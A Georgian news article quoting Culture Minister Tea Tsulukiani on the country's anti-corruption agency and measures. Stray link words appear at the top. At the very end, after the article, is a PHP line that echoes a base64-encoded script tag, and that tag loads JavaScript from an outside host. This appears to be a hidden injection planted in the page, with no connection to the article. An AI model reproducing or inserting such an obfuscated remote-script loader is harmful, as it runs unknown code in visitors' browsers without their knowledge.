celsiusi
ავერსი საქკაბელი

საქართველოს კულტურის მინისტრის თეა წულუკიანის განცხადებით, ბოლო წლებში სწორედ ირაკლი ღარიბაშვილის ხელმძღვანელობით საქართველოში ჩამოყალიბდა ანტიკორუფციული სააგენტო, ასევე, შემუშავდა არაერთი მექანიზმი, რათა ქვეყანაში კორუფციის რისკ-ფაქტორები მაქსიმალურად დაზღვეული ყოფილიყო.

წულუკიანის თქმით, ეს მიდგომები უნდა გაგრძელდეს და კორუფციის რისკთან ბრძოლა უფრო მაღალ ხარისხში უნდა ავიდეს.

„ბიძინა ივანიშვილმა ისაუბრა რისკებზე, ასეთი რისკ-ფაქტორები ნებისმიერ დროს არსებობს და ყველა მთავრობის, ხელისუფლების ვალია, იმუშაოს ამ რისკების პრევენციაზე, რათა რისკები არ მატერიალიზდეს. თავის დროზე, როდესაც იუსტიციის მინისტრის რანგში კორუფციის წინააღმდეგ ბრძოლის სხვადასხვა უწყებათაშორის სამუშაოს ვუძღვებოდი, მახსოვს, ჩვენ შევიმუშავეთ არაერთი მექანიზმი იმისთვის, რომ ჩვენს ქვეყანაში კორუფციის რისკი ყოფილიყო მაქსიმალურად დაზღვეული. ასევე, ბოლო წლებში სწორედ ირაკლი ღარიბაშვილის ხელმძღვანელობით საქართველოში ჩამოყალიბდა ანტიკორუფციული სააგენტო. ჩვენი ქვეყანა არის ერთ-ერთი მოწინავე, არა მხოლოდ ჩვენს რეგიონში, არამედ ევროპისა და მსოფლიო დონეზე კორუფციასთან ბრძოლის ნიშნით, ყველა რეიტინგი ამას ადასტურებს. რა თქმა უნდა, ეს მიდგომები უნდა გაგრძელდეს, რისკ-ფაქტორებთან ბრძოლა კიდევ უფრო მაღალ ხარისხში უნდა ავიდეს და აქ  ვერ იქნება ვერანაირი განსხვავებული აზრი ამ თემასთან დაკავშირებით“, – აღნიშნა თეა წულუკიანმა.

275
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");